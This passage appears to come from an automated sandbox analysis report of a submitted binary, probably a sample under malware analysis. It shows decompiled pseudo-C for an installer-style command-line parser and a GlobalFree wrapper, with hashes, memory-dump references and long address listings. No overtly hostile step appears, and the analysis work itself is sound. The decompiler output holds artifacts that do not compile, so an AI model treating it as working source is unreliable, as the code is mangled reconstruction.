                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82B0123214430CB7DF001FC2EC09F873F1DE7C5762F140000F60C450908A7694108696
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00054CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00054CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                                0x00054cc8
                                                                                                                                                                                                                                                0x00054ccf

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeGlobal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2979337801-0
                                                                                                                                                                                                                                                • Opcode ID: 3d52d60b5e987bf09b850748bfc0e8b7207deb9b8c392c42ae5d6651b0324d99
                                                                                                                                                                                                                                                • Instruction ID: 83e693bb6c41873a4735173b69ca9664d333b1a6de1686240db6fbe30ed4e9a9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d52d60b5e987bf09b850748bfc0e8b7207deb9b8c392c42ae5d6651b0324d99
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57B0123100020CB78F001B42EC088463F1DD7C13617000010F60C410218B3B98118585
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 00055C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422COMMONCrypto
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E00055C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x58004; // 0x5a679bd9
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00056CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00056E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x58004; // 0x5a679bd9
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0005597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E000544B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x59124 = E00056285();
									_t75 = 0;
								}
								return E00056CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E000544B9(0, 0x521, 0x51140, 0, 0x40, 0);
												_t85 =  *0x58588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0005667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0005667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00055C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00051680(0x58c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0005667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0005667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x58a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00055C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x58b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x58a3a;
																}
																E00051680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0005658A(_t218, 0x104, 0x51140);
																if(E000531E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x58a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x58a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x58a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x58a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x58a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x59a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x59a2c =  *0x59a2c | _t143;
																					goto L70;
																				} else {
																					_t145 = _t142 - 3;
																					if(_t145 == 0) {
																						 *0x58d48 =  *0x58d48 | 0x00000040;
																					} else {
																						_t146 = _t145 - 5;
																						if(_t146 == 0) {
																							 *0x59a2c =  *0x59a2c & 0xfffffffd;
																							goto L70;
																						} else {
																							_t147 = _t146 - 5;
																							if(_t147 == 0) {
																								 *0x59a2c =  *0x59a2c & 0xfffffffe;
																								goto L70;
																							} else {
																								_t149 = _t147;
																								if(_t149 == 0) {
																									 *0x58d48 =  *0x58d48 | 0x00000080;
																								} else {
																									if(_t149 == 3) {
																										 *0x59a2c =  *0x59a2c | 0x00000004;
																										L70:
																										 *0x58a28 = 1;
																									} else {
																										_t209 = 0;
																									}
																								}
																							}
																						}
																					}
																				}
																				_t144 =  *_t220;
																				_t201 = _t144;
																			} while (_t144 != 0);
																		}
																	}
																} else {
																	 *0x59a2c = 3;
																	 *0x58a28 = 1;
																}
																goto L50;
															} else {
																if(_t132 == 0) {
																	goto L98;
																} else {
																	L49:
																	_t209 = 0;
																	L50:
																	_t173 = _v272;
																	if( *_t173 != 0) {
																		goto L2;
																	} else {
																		break;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											goto L106;
										}
									} else {
										L34:
										_t209 = 0;
										break;
									}
								}
							}
						}
						goto L131;
					}
					if( *0x58a2c != 0 &&  *0x58b3e == 0) {
						if(GetModuleFileNameA( *0x59a3c, 0x58b3e, 0x104) == 0) {
							_t209 = 0;
						} else {
							_t202 = 0x5c;
							 *((char*)(E000566C8(0x58b3e, _t202) + 1)) = 0;
						}
					}
					_t63 = _t209;
				}
				L131:
			}


































































                                                                                                                                                                                                                                                0x00055c9e
                                                                                                                                                                                                                                                0x00055ca9
                                                                                                                                                                                                                                                0x00055cb0
                                                                                                                                                                                                                                                0x00055cb3
                                                                                                                                                                                                                                                0x00055cb6
                                                                                                                                                                                                                                                0x00055cb7
                                                                                                                                                                                                                                                0x00055cb8
                                                                                                                                                                                                                                                0x00055cbd
                                                                                                                                                                                                                                                0x00056204
                                                                                                                                                                                                                                                0x00055ccb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055ccb
                                                                                                                                                                                                                                                0x00055cd3
                                                                                                                                                                                                                                                0x00055cd7
                                                                                                                                                                                                                                                0x00055cf4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055cf4
                                                                                                                                                                                                                                                0x00055cf8
                                                                                                                                                                                                                                                0x00055d00
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d06
                                                                                                                                                                                                                                                0x00055d06
                                                                                                                                                                                                                                                0x00055d0e
                                                                                                                                                                                                                                                0x00055d10
                                                                                                                                                                                                                                                0x00055d12
                                                                                                                                                                                                                                                0x00055d14
                                                                                                                                                                                                                                                0x00055d15
                                                                                                                                                                                                                                                0x00055d17
                                                                                                                                                                                                                                                0x00055d49
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d19
                                                                                                                                                                                                                                                0x00055d19
                                                                                                                                                                                                                                                0x00055d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d3f
                                                                                                                                                                                                                                                0x00055d3f
                                                                                                                                                                                                                                                0x00055d4b
                                                                                                                                                                                                                                                0x00055d4b
                                                                                                                                                                                                                                                0x00055d4f
                                                                                                                                                                                                                                                0x00055d8d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d93
                                                                                                                                                                                                                                                0x00055d93
                                                                                                                                                                                                                                                0x00055d9a
                                                                                                                                                                                                                                                0x00055d9d
                                                                                                                                                                                                                                                0x00055d9e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d9e
                                                                                                                                                                                                                                                0x00055d51
                                                                                                                                                                                                                                                0x00055d5b
                                                                                                                                                                                                                                                0x00055d72
                                                                                                                                                                                                                                                0x000560fb
                                                                                                                                                                                                                                                0x000560fb
                                                                                                                                                                                                                                                0x00056207
                                                                                                                                                                                                                                                0x0005620a
                                                                                                                                                                                                                                                0x0005620b
                                                                                                                                                                                                                                                0x0005620e
                                                                                                                                                                                                                                                0x00056217
                                                                                                                                                                                                                                                0x00055d78
                                                                                                                                                                                                                                                0x00055d78
                                                                                                                                                                                                                                                0x00055d80
                                                                                                                                                                                                                                                0x00055d83
                                                                                                                                                                                                                                                0x00055d84
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d84
                                                                                                                                                                                                                                                0x00055d5d
                                                                                                                                                                                                                                                0x00055d5f
                                                                                                                                                                                                                                                0x00055d62
                                                                                                                                                                                                                                                0x00055d68
                                                                                                                                                                                                                                                0x00055d64
                                                                                                                                                                                                                                                0x00055d64
                                                                                                                                                                                                                                                0x00055d64
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d62
                                                                                                                                                                                                                                                0x00055d5b
                                                                                                                                                                                                                                                0x00055d4f
                                                                                                                                                                                                                                                0x00055d1d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d9f
                                                                                                                                                                                                                                                0x00055d9f
                                                                                                                                                                                                                                                0x00055da5
                                                                                                                                                                                                                                                0x00055dab
                                                                                                                                                                                                                                                0x00055dba
                                                                                                                                                                                                                                                0x00056218
                                                                                                                                                                                                                                                0x0005621d
                                                                                                                                                                                                                                                0x00056220
                                                                                                                                                                                                                                                0x00056221
                                                                                                                                                                                                                                                0x00056229
                                                                                                                                                                                                                                                0x00056230
                                                                                                                                                                                                                                                0x00056247
                                                                                                                                                                                                                                                0x0005626a
                                                                                                                                                                                                                                                0x00056272
                                                                                                                                                                                                                                                0x00056249
                                                                                                                                                                                                                                                0x00056255
                                                                                                                                                                                                                                                0x0005625f
                                                                                                                                                                                                                                                0x00056264
                                                                                                                                                                                                                                                0x00056264
                                                                                                                                                                                                                                                0x00056284
                                                                                                                                                                                                                                                0x00055dc0
                                                                                                                                                                                                                                                0x00055dc0
                                                                                                                                                                                                                                                0x00055dca
                                                                                                                                                                                                                                                0x00055e22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055dcc
                                                                                                                                                                                                                                                0x00055dce
                                                                                                                                                                                                                                                0x00055e24
                                                                                                                                                                                                                                                0x00055e24
                                                                                                                                                                                                                                                0x00055e2c
                                                                                                                                                                                                                                                0x00055e47
                                                                                                                                                                                                                                                0x00055e4a
                                                                                                                                                                                                                                                0x000561d2
                                                                                                                                                                                                                                                0x000561e2
                                                                                                                                                                                                                                                0x000561e7
                                                                                                                                                                                                                                                0x000561ee
                                                                                                                                                                                                                                                0x000561f1
                                                                                                                                                                                                                                                0x000561f1
                                                                                                                                                                                                                                                0x000561f8
                                                                                                                                                                                                                                                0x000561f8
                                                                                                                                                                                                                                                0x00055e50
                                                                                                                                                                                                                                                0x00055e53
                                                                                                                                                                                                                                                0x00056109
                                                                                                                                                                                                                                                0x0005611f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056125
                                                                                                                                                                                                                                                0x00056137
                                                                                                                                                                                                                                                0x0005613a
                                                                                                                                                                                                                                                0x0005613c
                                                                                                                                                                                                                                                0x0005613e
                                                                                                                                                                                                                                                0x0005613e
                                                                                                                                                                                                                                                0x00056141
                                                                                                                                                                                                                                                0x00056141
                                                                                                                                                                                                                                                0x00056143
                                                                                                                                                                                                                                                0x00056144
                                                                                                                                                                                                                                                0x0005614a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056150
                                                                                                                                                                                                                                                0x00056152
                                                                                                                                                                                                                                                0x0005615c
                                                                                                                                                                                                                                                0x00056170
                                                                                                                                                                                                                                                0x00056172
                                                                                                                                                                                                                                                0x0005617c
                                                                                                                                                                                                                                                0x00056190
                                                                                                                                                                                                                                                0x00056190
                                                                                                                                                                                                                                                0x00056196
                                                                                                                                                                                                                                                0x000561a5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000561ab
                                                                                                                                                                                                                                                0x000561b9
                                                                                                                                                                                                                                                0x000561c6
                                                                                                                                                                                                                                                0x000561c6
                                                                                                                                                                                                                                                0x0005617e
                                                                                                                                                                                                                                                0x00056180
                                                                                                                                                                                                                                                0x0005618a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005618a
                                                                                                                                                                                                                                                0x0005615e
                                                                                                                                                                                                                                                0x00056160
                                                                                                                                                                                                                                                0x0005616a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005616a
                                                                                                                                                                                                                                                0x0005615c
                                                                                                                                                                                                                                                0x0005614a
                                                                                                                                                                                                                                                0x0005610b
                                                                                                                                                                                                                                                0x0005610e
                                                                                                                                                                                                                                                0x0005610e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055e59
                                                                                                                                                                                                                                                0x00055e59
                                                                                                                                                                                                                                                0x00055e5c
                                                                                                                                                                                                                                                0x0005604f
                                                                                                                                                                                                                                                0x00056056
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005605c
                                                                                                                                                                                                                                                0x0005606e
                                                                                                                                                                                                                                                0x00056071
                                                                                                                                                                                                                                                0x00056073
                                                                                                                                                                                                                                                0x00056075
                                                                                                                                                                                                                                                0x00056075
                                                                                                                                                                                                                                                0x00056078
                                                                                                                                                                                                                                                0x00056078
                                                                                                                                                                                                                                                0x0005607a
                                                                                                                                                                                                                                                0x0005607b
                                                                                                                                                                                                                                                0x00056081
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00056087
                                                                                                                                                                                                                                                0x00056087
                                                                                                                                                                                                                                                0x0005608d
                                                                                                                                                                                                                                                0x0005609c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000560a2
                                                                                                                                                                                                                                                0x000560aa
                                                                                                                                                                                                                                                0x000560b2
                                                                                                                                                                                                                                                0x000560b7
                                                                                                                                                                                                                                                0x000560bd
                                                                                                                                                                                                                                                0x000560bf
                                                                                                                                                                                                                                                0x000560bf
                                                                                                                                                                                                                                                0x000560d6
                                                                                                                                                                                                                                                0x000560e0
                                                                                                                                                                                                                                                0x000560e7
                                                                                                                                                                                                                                                0x000560f5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000560f5
                                                                                                                                                                                                                                                0x0005609c
                                                                                                                                                                                                                                                0x00056081
                                                                                                                                                                                                                                                0x00055e62
                                                                                                                                                                                                                                                0x00055e62
                                                                                                                                                                                                                                                0x00055e65
                                                                                                                                                                                                                                                0x00055fd3
                                                                                                                                                                                                                                                0x00055fe9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055fef
                                                                                                                                                                                                                                                0x00055fef
                                                                                                                                                                                                                                                0x00055ff7
                                                                                                                                                                                                                                                0x00055ffd
                                                                                                                                                                                                                                                0x00056003
                                                                                                                                                                                                                                                0x00056006
                                                                                                                                                                                                                                                0x00056011
                                                                                                                                                                                                                                                0x00056014
                                                                                                                                                                                                                                                0x0005603d
                                                                                                                                                                                                                                                0x00056016
                                                                                                                                                                                                                                                0x00056018
                                                                                                                                                                                                                                                0x00056019
                                                                                                                                                                                                                                                0x0005601b
                                                                                                                                                                                                                                                0x00056033
                                                                                                                                                                                                                                                0x0005601d
                                                                                                                                                                                                                                                0x00056020
                                                                                                                                                                                                                                                0x00056029
                                                                                                                                                                                                                                                0x00056022
                                                                                                                                                                                                                                                0x00056022
                                                                                                                                                                                                                                                0x00056022
                                                                                                                                                                                                                                                0x00056020
                                                                                                                                                                                                                                                0x0005601b
                                                                                                                                                                                                                                                0x00056042
                                                                                                                                                                                                                                                0x00056044
                                                                                                                                                                                                                                                0x00056046
                                                                                                                                                                                                                                                0x0005604a
                                                                                                                                                                                                                                                0x00055ff7
                                                                                                                                                                                                                                                0x00055fd5
                                                                                                                                                                                                                                                0x00055fd8
                                                                                                                                                                                                                                                0x00055fd8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055e6b
                                                                                                                                                                                                                                                0x00055e6b
                                                                                                                                                                                                                                                0x00055e6e
                                                                                                                                                                                                                                                0x00055f8b
                                                                                                                                                                                                                                                0x00055f99
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055f9f
                                                                                                                                                                                                                                                0x00055fa7
                                                                                                                                                                                                                                                0x00055faf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055fb1
                                                                                                                                                                                                                                                0x00055fb3
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055fb5
                                                                                                                                                                                                                                                0x00055fb7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055fb9
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055fb9
                                                                                                                                                                                                                                                0x00055fb7
                                                                                                                                                                                                                                                0x00055fb3
                                                                                                                                                                                                                                                0x00055faf
                                                                                                                                                                                                                                                0x00055f8d
                                                                                                                                                                                                                                                0x00055f8d
                                                                                                                                                                                                                                                0x00055f8d
                                                                                                                                                                                                                                                0x00055f8f
                                                                                                                                                                                                                                                0x00055fc1
                                                                                                                                                                                                                                                0x00055fc1
                                                                                                                                                                                                                                                0x00055fc1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055e74
                                                                                                                                                                                                                                                0x00055e74
                                                                                                                                                                                                                                                0x00055e77
                                                                                                                                                                                                                                                0x00055ea0
                                                                                                                                                                                                                                                0x00055ebd
                                                                                                                                                                                                                                                0x00055f79
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055f7f
                                                                                                                                                                                                                                                0x00055ec3
                                                                                                                                                                                                                                                0x00055ec3
                                                                                                                                                                                                                                                0x00055ecc
                                                                                                                                                                                                                                                0x00055ed4
                                                                                                                                                                                                                                                0x00055ed6
                                                                                                                                                                                                                                                0x00055edc
                                                                                                                                                                                                                                                0x00055edf
                                                                                                                                                                                                                                                0x00055eea
                                                                                                                                                                                                                                                0x00055eed
                                                                                                                                                                                                                                                0x00055f3f
                                                                                                                                                                                                                                                0x00055f40
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055eef
                                                                                                                                                                                                                                                0x00055eef
                                                                                                                                                                                                                                                0x00055ef2
                                                                                                                                                                                                                                                0x00055f34
                                                                                                                                                                                                                                                0x00055ef4
                                                                                                                                                                                                                                                0x00055ef4
                                                                                                                                                                                                                                                0x00055ef7
                                                                                                                                                                                                                                                0x00055f2b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055ef9
                                                                                                                                                                                                                                                0x00055ef9
                                                                                                                                                                                                                                                0x00055efc
                                                                                                                                                                                                                                                0x00055f22
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055efe
                                                                                                                                                                                                                                                0x00055eff
                                                                                                                                                                                                                                                0x00055f02
                                                                                                                                                                                                                                                0x00055f16
                                                                                                                                                                                                                                                0x00055f04
                                                                                                                                                                                                                                                0x00055f07
                                                                                                                                                                                                                                                0x00055f0d
                                                                                                                                                                                                                                                0x00055f46
                                                                                                                                                                                                                                                0x00055f46
                                                                                                                                                                                                                                                0x00055f09
                                                                                                                                                                                                                                                0x00055f09
                                                                                                                                                                                                                                                0x00055f09
                                                                                                                                                                                                                                                0x00055f07
                                                                                                                                                                                                                                                0x00055f02
                                                                                                                                                                                                                                                0x00055efc
                                                                                                                                                                                                                                                0x00055ef7
                                                                                                                                                                                                                                                0x00055ef2
                                                                                                                                                                                                                                                0x00055f4c
                                                                                                                                                                                                                                                0x00055f4e
                                                                                                                                                                                                                                                0x00055f50
                                                                                                                                                                                                                                                0x00055f54
                                                                                                                                                                                                                                                0x00055ed4
                                                                                                                                                                                                                                                0x00055ea2
                                                                                                                                                                                                                                                0x00055ea4
                                                                                                                                                                                                                                                0x00055eaf
                                                                                                                                                                                                                                                0x00055eaf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055e79
                                                                                                                                                                                                                                                0x00055e7d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055e83
                                                                                                                                                                                                                                                0x00055e83
                                                                                                                                                                                                                                                0x00055e83
                                                                                                                                                                                                                                                0x00055e85
                                                                                                                                                                                                                                                0x00055e85
                                                                                                                                                                                                                                                0x00055e8e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055e94
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055e94
                                                                                                                                                                                                                                                0x00055e8e
                                                                                                                                                                                                                                                0x00055e7d
                                                                                                                                                                                                                                                0x00055e77
                                                                                                                                                                                                                                                0x00055e6e
                                                                                                                                                                                                                                                0x00055e65
                                                                                                                                                                                                                                                0x00055e5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055dd0
                                                                                                                                                                                                                                                0x00055dd0
                                                                                                                                                                                                                                                0x00055dd0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055dd0
                                                                                                                                                                                                                                                0x00055dce
                                                                                                                                                                                                                                                0x00055dca
                                                                                                                                                                                                                                                0x00055dba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055d00
                                                                                                                                                                                                                                                0x00055dd9
                                                                                                                                                                                                                                                0x00055e04
                                                                                                                                                                                                                                                0x000561fe
                                                                                                                                                                                                                                                0x00055e0a
                                                                                                                                                                                                                                                0x00055e0c
                                                                                                                                                                                                                                                0x00055e17
                                                                                                                                                                                                                                                0x00055e17
                                                                                                                                                                                                                                                0x00055e04
                                                                                                                                                                                                                                                0x00056200
                                                                                                                                                                                                                                                0x00056200
